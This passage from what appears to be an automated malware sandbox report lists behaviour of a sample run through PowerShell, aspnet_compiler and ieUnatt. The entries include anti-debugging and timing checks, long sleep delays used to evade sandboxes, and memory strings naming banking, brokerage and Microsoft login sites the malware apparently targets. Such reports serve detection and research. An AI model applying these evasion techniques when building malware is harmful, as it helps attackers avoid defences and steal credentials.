                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\ieUnatt.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\ieUnatt.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\ieUnatt.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\ieUnatt.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\ieUnatt.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Source: C:\Windows\SysWOW64\ieUnatt.exeAPI/Special instruction interceptor: Address: 7FFDB442D324
                  Source: C:\Windows\SysWOW64\ieUnatt.exeAPI/Special instruction interceptor: Address: 7FFDB442D7E4
                  Source: C:\Windows\SysWOW64\ieUnatt.exeAPI/Special instruction interceptor: Address: 7FFDB442D944
                  Source: C:\Windows\SysWOW64\ieUnatt.exeAPI/Special instruction interceptor: Address: 7FFDB442D504
                  Source: C:\Windows\SysWOW64\ieUnatt.exeAPI/Special instruction interceptor: Address: 7FFDB442D544
                  Source: C:\Windows\SysWOW64\ieUnatt.exeAPI/Special instruction interceptor: Address: 7FFDB442D1E4
                  Source: C:\Windows\SysWOW64\ieUnatt.exeAPI/Special instruction interceptor: Address: 7FFDB4430154
                  Source: C:\Windows\SysWOW64\ieUnatt.exeAPI/Special instruction interceptor: Address: 7FFDB442DA44
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0109096E rdtsc 11_2_0109096E
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7893Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1678Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3296Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6407Jump to behavior
                  Source: C:\Windows\SysWOW64\ieUnatt.exeWindow / User API: threadDelayed 2293Jump to behavior
                  Source: C:\Windows\SysWOW64\ieUnatt.exeWindow / User API: threadDelayed 7678Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\dtaz5slk\dtaz5slk.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeAPI coverage: 0.7 %
                  Source: C:\Windows\SysWOW64\ieUnatt.exeAPI coverage: 3.0 %
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6956Thread sleep count: 7893 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3460Thread sleep count: 1678 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5948Thread sleep time: -9223372036854770s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5916Thread sleep time: -13835058055282155s >= -30000sJump to behavior
                  Source: C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exe TID: 3552Thread sleep time: -45000s >= -30000sJump to behavior
                  Source: C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exe TID: 3552Thread sleep time: -45000s >= -30000sJump to behavior
                  Source: C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exe TID: 3552Thread sleep time: -30000s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\ieUnatt.exe TID: 1548Thread sleep count: 2293 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\ieUnatt.exe TID: 1548Thread sleep time: -4586000s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\ieUnatt.exe TID: 1548Thread sleep count: 7678 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\ieUnatt.exe TID: 1548Thread sleep time: -15356000s >= -30000sJump to behavior
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\SysWOW64\ieUnatt.exeLast function: Thread delayed
                  Source: C:\Windows\SysWOW64\ieUnatt.exeLast function: Thread delayed
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_0293BFD0 FindFirstFileW,FindNextFileW,FindClose,14_2_0293BFD0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: N78Im7H.14.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                  Source: N78Im7H.14.drBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                  Source: N78Im7H.14.drBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
                  Source: powershell.exe, 00000003.00000002.2198089199.0000000005427000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
                  Source: N78Im7H.14.drBinary or memory string: discord.comVMware20,11696487552f
                  Source: N78Im7H.14.drBinary or memory string: bankofamerica.comVMware20,11696487552x
                  Source: N78Im7H.14.drBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
                  Source: powershell.exe, 00000003.00000002.2203096096.00000000089C2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: N78Im7H.14.drBinary or memory string: ms.portal.azure.comVMware20,11696487552
                  Source: powershell.exe, 00000008.00000002.2474478084.0000000007755000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllh
                  Source: N78Im7H.14.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                  Source: ieUnatt.exe, 0000000E.00000002.4512419516.00000000029AA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll*
                  Source: N78Im7H.14.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                  Source: N78Im7H.14.drBinary or memory string: global block list test formVMware20,11696487552
                  Source: N78Im7H.14.drBinary or memory string: tasks.office.comVMware20,11696487552o
                  Source: powershell.exe, 00000003.00000002.2198089199.0000000005427000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
                  Source: N78Im7H.14.drBinary or memory string: AMC password management pageVMware20,11696487552
                  Source: lSomfUdjbC.exe, 0000000C.00000002.4513135714.000000000153E000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.2823752165.000001CDAEF2C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: N78Im7H.14.drBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
                  Source: N78Im7H.14.drBinary or memory string: interactivebrokers.comVMware20,11696487552
                  Source: N78Im7H.14.drBinary or memory string: dev.azure.comVMware20,11696487552j
                  Source: N78Im7H.14.drBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
                  Source: powershell.exe, 00000003.00000002.2203096096.00000000089C2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWU
                  Source: N78Im7H.14.drBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                  Source: N78Im7H.14.drBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
                  Source: N78Im7H.14.drBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                  Source: powershell.exe, 00000003.00000002.2198089199.0000000005427000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
                  Source: N78Im7H.14.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                  Source: N78Im7H.14.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                  Source: N78Im7H.14.drBinary or memory string: outlook.office365.comVMware20,11696487552t
                  Source: N78Im7H.14.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                  Source: N78Im7H.14.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                  Source: N78Im7H.14.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                  Source: N78Im7H.14.drBinary or memory string: outlook.office.comVMware20,11696487552s
                  Source: N78Im7H.14.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                  Source: N78Im7H.14.drBinary or memory string: turbotax.intuit.comVMware20,11696487552t
                  Source: N78Im7H.14.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
                  Source: N78Im7H.14.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
                  Source: N78Im7H.14.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                  Source: powershell.exe, 00000003.00000002.2201321954.0000000007A57000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWHM
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Windows\SysWOW64\ieUnatt.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0109096E rdtsc 11_2_0109096E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_00417063 LdrLoadDll,11_2_00417063
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010FE10E mov eax, dword ptr fs:[00000030h]11_2_010FE10E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010FE10E mov ecx, dword ptr fs:[00000030h]11_2_010FE10E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010FE10E mov eax, dword ptr fs:[00000030h]11_2_010FE10E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010FE10E mov eax, dword ptr fs:[00000030h]11_2_010FE10E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010FE10E mov ecx, dword ptr fs:[00000030h]11_2_010FE10E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010FE10E mov eax, dword ptr fs:[00000030h]11_2_010FE10E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010FE10E mov eax, dword ptr fs:[00000030h]11_2_010FE10E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010FE10E mov ecx, dword ptr fs:[00000030h]11_2_010FE10E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010FE10E mov eax, dword ptr fs:[00000030h]11_2_010FE10E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010FE10E mov ecx, dword ptr fs:[00000030h]11_2_010FE10E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01110115 mov eax, dword ptr fs:[00000030h]11_2_01110115
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010FA118 mov ecx, dword ptr fs:[00000030h]11_2_010FA118
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010FA118 mov eax, dword ptr fs:[00000030h]11_2_010FA118
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010FA118 mov eax, dword ptr fs:[00000030h]11_2_010FA118
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010FA118 mov eax, dword ptr fs:[00000030h]11_2_010FA118
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01080124 mov eax, dword ptr fs:[00000030h]11_2_01080124
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010E4144 mov eax, dword ptr fs:[00000030h]11_2_010E4144
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010E4144 mov eax, dword ptr fs:[00000030h]11_2_010E4144
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010E4144 mov ecx, dword ptr fs:[00000030h]11_2_010E4144
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010E4144 mov eax, dword ptr fs:[00000030h]11_2_010E4144
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010E4144 mov eax, dword ptr fs:[00000030h]11_2_010E4144
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01056154 mov eax, dword ptr fs:[00000030h]11_2_01056154
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01056154 mov eax, dword ptr fs:[00000030h]11_2_01056154
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0104C156 mov eax, dword ptr fs:[00000030h]11_2_0104C156
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010E8158 mov eax, dword ptr fs:[00000030h]11_2_010E8158
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01090185 mov eax, dword ptr fs:[00000030h]11_2_01090185
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010F4180 mov eax, dword ptr fs:[00000030h]11_2_010F4180
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010F4180 mov eax, dword ptr fs:[00000030h]11_2_010F4180
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010D019F mov eax, dword ptr fs:[00000030h]11_2_010D019F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010D019F mov eax, dword ptr fs:[00000030h]11_2_010D019F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010D019F mov eax, dword ptr fs:[00000030h]11_2_010D019F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010D019F mov eax, dword ptr fs:[00000030h]11_2_010D019F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0104A197 mov eax, dword ptr fs:[00000030h]11_2_0104A197
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0104A197 mov eax, dword ptr fs:[00000030h]11_2_0104A197
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0104A197 mov eax, dword ptr fs:[00000030h]11_2_0104A197
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0110C188 mov eax, dword ptr fs:[00000030h]11_2_0110C188
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0110C188 mov eax, dword ptr fs:[00000030h]11_2_0110C188
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_011161C3 mov eax, dword ptr fs:[00000030h]11_2_011161C3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_011161C3 mov eax, dword ptr fs:[00000030h]11_2_011161C3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010CE1D0 mov eax, dword ptr fs:[00000030h]11_2_010CE1D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010CE1D0 mov eax, dword ptr fs:[00000030h]11_2_010CE1D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010CE1D0 mov ecx, dword ptr fs:[00000030h]11_2_010CE1D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010CE1D0 mov eax, dword ptr fs:[00000030h]11_2_010CE1D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010CE1D0 mov eax, dword ptr fs:[00000030h]11_2_010CE1D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010801F8 mov eax, dword ptr fs:[00000030h]11_2_010801F8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_011261E5 mov eax, dword ptr fs:[00000030h]11_2_011261E5
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010D4000 mov ecx, dword ptr fs:[00000030h]11_2_010D4000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010F2000 mov eax, dword ptr fs:[00000030h]11_2_010F2000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010F2000 mov eax, dword ptr fs:[00000030h]11_2_010F2000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010F2000 mov eax, dword ptr fs:[00000030h]11_2_010F2000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010F2000 mov eax, dword ptr fs:[00000030h]11_2_010F2000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010F2000 mov eax, dword ptr fs:[00000030h]11_2_010F2000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010F2000 mov eax, dword ptr fs:[00000030h]11_2_010F2000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010F2000 mov eax, dword ptr fs:[00000030h]11_2_010F2000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010F2000 mov eax, dword ptr fs:[00000030h]11_2_010F2000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0106E016 mov eax, dword ptr fs:[00000030h]11_2_0106E016
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0106E016 mov eax, dword ptr fs:[00000030h]11_2_0106E016
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0106E016 mov eax, dword ptr fs:[00000030h]11_2_0106E016
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0106E016 mov eax, dword ptr fs:[00000030h]11_2_0106E016
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0104A020 mov eax, dword ptr fs:[00000030h]11_2_0104A020
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0104C020 mov eax, dword ptr fs:[00000030h]11_2_0104C020
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010E6030 mov eax, dword ptr fs:[00000030h]11_2_010E6030
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01052050 mov eax, dword ptr fs:[00000030h]11_2_01052050
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010D6050 mov eax, dword ptr fs:[00000030h]11_2_010D6050
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0107C073 mov eax, dword ptr fs:[00000030h]11_2_0107C073
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0105208A mov eax, dword ptr fs:[00000030h]11_2_0105208A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010E80A8 mov eax, dword ptr fs:[00000030h]11_2_010E80A8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_011160B8 mov eax, dword ptr fs:[00000030h]11_2_011160B8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_011160B8 mov ecx, dword ptr fs:[00000030h]11_2_011160B8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010D20DE mov eax, dword ptr fs:[00000030h]11_2_010D20DE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0104A0E3 mov ecx, dword ptr fs:[00000030h]11_2_0104A0E3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010580E9 mov eax, dword ptr fs:[00000030h]11_2_010580E9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010D60E0 mov eax, dword ptr fs:[00000030h]11_2_010D60E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0104C0F0 mov eax, dword ptr fs:[00000030h]11_2_0104C0F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010920F0 mov ecx, dword ptr fs:[00000030h]11_2_010920F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0108A30B mov eax, dword ptr fs:[00000030h]11_2_0108A30B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0108A30B mov eax, dword ptr fs:[00000030h]11_2_0108A30B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0108A30B mov eax, dword ptr fs:[00000030h]11_2_0108A30B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0104C310 mov ecx, dword ptr fs:[00000030h]11_2_0104C310
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01070310 mov ecx, dword ptr fs:[00000030h]11_2_01070310
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0111A352 mov eax, dword ptr fs:[00000030h]11_2_0111A352
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010D2349 mov eax, dword ptr fs:[00000030h]11_2_010D2349
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010D2349 mov eax, dword ptr fs:[00000030h]11_2_010D2349
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010D2349 mov eax, dword ptr fs:[00000030h]11_2_010D2349
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010D2349 mov eax, dword ptr fs:[00000030h]11_2_010D2349
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010D2349 mov eax, dword ptr fs:[00000030h]11_2_010D2349
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010D2349 mov eax, dword ptr fs:[00000030h]11_2_010D2349
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010D2349 mov eax, dword ptr fs:[00000030h]11_2_010D2349
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010D2349 mov eax, dword ptr fs:[00000030h]11_2_010D2349
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010D2349 mov eax, dword ptr fs:[00000030h]11_2_010D2349
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010D2349 mov eax, dword ptr fs:[00000030h]11_2_010D2349
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010D2349 mov eax, dword ptr fs:[00000030h]11_2_010D2349
